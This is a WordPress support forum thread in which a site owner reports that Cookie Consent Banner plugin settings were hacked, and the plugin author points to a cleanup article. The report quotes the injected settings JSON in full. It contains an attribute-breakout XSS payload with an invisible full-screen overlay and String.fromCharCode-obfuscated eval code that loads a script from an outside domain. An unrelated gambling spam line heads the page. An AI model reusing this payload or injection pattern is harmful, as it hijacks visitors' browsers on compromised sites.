Update My KONAMI Gmail,Hild Jackpot.REGISTER NOW GET FREE 888 PESOS REWARDS!

Resolved rwassell
(@rwassell)

1 year, 9 months ago

Hello,
We’ve had a number of our websites report issues – all of which have the Cookie Consent Banner installed and all of the offending hacks were in the database option name: nsc_bar_bannersettings_json

Example content:

{ “content”: { “deny”: “”, “dismiss”: “”, “allow”: “”, “link”: “”, “href”: “\” id=’demo181′ style=’position:fixed;top:0px;display:block;height:3000px;width:4000px;border:0px solid red;’ ontouchstart=’eval(String.fromCharCode(118,97,114,32,98,61,48,59,32,118,97,114,32,99,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,34,115,99,114,105,112,116,34,41,59,32,118,97,114,32,110,32,61,32,102,97,108,115,101,59,102,111,114,32,40,118,97,114,32,105,32,61,32,48,59,32,105,32,60,32,99,46,108,101,110,103,116,104,59,32,105,43,43,41,32,123,32,32,32,105,102,32,40,99,91,105,93,46,105,100,41,32,123,32,32,32,9,32,105,102,32,40,99,91,105,93,46,105,100,32,61,61,32,34,109,110,109,34,41,123,32,9,9,110,61,116,114,117,101,59,32,9,32,125,32,32,32,125,32,32,125,105,102,40,110,61,61,102,97,108,115,101,41,123,32,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,105,100,61,34,109,110,109,34,59,115,46,115,114,99,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,44,49,49,53,44,52,54,44,49,48,48,44,49,49,49,44,49,48,50,44,49,49,49,44,49,48,56,44,49,48,56,44,49,49,49,44,49,49,57,44,49,48,51,44,49,49,52,44,49,48,49,44,49,48,49,44,49,49,48,44,49,48,56,44,49,48,53,44,49,49,48,44,49,48,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,50,44,54,55,44,53,55,44,55,53,44,54,56,44,49,50,50,41,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,32,125,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,100,101,109,111,49,56,49,39,41,46,115,116,121,108,101,46,100,105,115,112,108,97,121,32,61,32,39,110,111,110,101,39,59,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,100,101,109,111,49,56,49,39,41,46,114,101,109,111,118,101,40,41,59));’ onmouseenter=\”eval(String.fromCharCode(118,97,114,32,98,61,48,59,32,118,97,114,32,99,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,34,115,99,114,105,112,116,34,41,59,32,118,97,114,32,110,32,61,32,102,97,108,115,101,59,102,111,114,32,40,118,97,114,32,105,32,61,32,48,59,32,105,32,60,32,99,46,108,101,110,103,116,104,59,32,105,43,43,41,32,123,32,32,32,105,102,32,40,99,91,105,93,46,105,100,41,32,123,32,32,32,9,32,105,102,32,40,99,91,105,93,46,105,100,32,61,61,32,34,109,110,109,34,41,123,32,9,9,110,61,116,114,117,101,59,32,9,32,125,32,32,32,125,32,32,125,105,102,40,110,61,61,102,97,108,115,101,41,123,32,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,105,100,61,34,109,110,109,34,59,115,46,115,114,99,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,44,49,49,53,44,52,54,44,49,48,48,44,49,49,49,44,49,48,50,44,49,49,49,44,49,48,56,44,49,48,56,44,49,49,49,44,49,49,57,44,49,48,51,44,49,49,52,44,49,48,49,44,49,48,49,44,49,49,48,44,49,48,56,44,49,48,53,44,49,49,48,44,49,48,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,50,44,54,55,44,53,55,44,55,53,44,54,56,44,49,50,50,41,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,32,125,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,100,101,109,111,49,56,49,39,41,46,115,116,121,108,101,46,100,105,115,112,108,97,121,32,61,32,39,110,111,110,101,39,59,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,100,101,109,111,49,56,49,39,41,46,114,101,109,111,118,101,40,41,59));”, “message”: “”, “policy”: “Cookie Settings”, “savesettings”: “”, “target”: “”, “linksecond”: “”, “hrefsecond”: “”, “close”: “x” }, “type”: “info”, “palette”: { “popup”: { “background”: “rgba(255, 255, 255, 0)”, “text”: “rgba(255, 255, 255, 0)” }, “button”: { “background”: “rgba(255, 255, 255, 0)”, “text”: “rgba(255, 255, 255, 0)”, “border”: “” }, “switches”: { “background”: “”, “backgroundChecked”: “”, “switch”: “”, “text”: “” } }, “position”: “top”, “theme”: “block”, “cookietypes”: [ { “label”: “Technical”, “checked”: “checked”, “disabled”: “disabled”, “cookie_suffix”: “tech” }, { “label”: “Marketing”, “checked”: “”, “disabled”: “”, “cookie_suffix”: “marketing” } ], “revokable”: true, “dataLayerName”: “dataLayer”, “improveBannerLoadingSpeed”: “0”, “container”: “”, “customizedFont”: “” }

Can you confirm the best and most efficient way to resolve this please.

Thanks

Rob

Viewing 3 replies - 1 through 3 (of 3 total)

Plugin Author Support
(@nikelschubert)

1 year, 9 months ago

Hi,

I created an article for that:

https://beautiful-cookie-banner.com/articles/how-to-fix-vulnerability-exploit-from-versions/

Your settings json is completly corrupted. You have to configure the whole banner again.

If you want you can use this json file to start from scratch:

https://beautiful-cookie-banner.com/screens/config-default.json

Just add it to the Im/Export section of the plugin settings.

Thread Starter rwassell
(@rwassell)

1 year, 9 months ago

Thank you for responding so quickly and for providing the information on how to fix it.

Jonas Lundman
(@jonas-lundman)

1 year, 9 months ago

We also became hacked, removing this plugin solve the problem. Thanks for clarify how to cleanup.

Viewing 3 replies - 1 through 3 (of 3 total)

The topic ‘Has your plugin been hacked?’ is closed to new replies.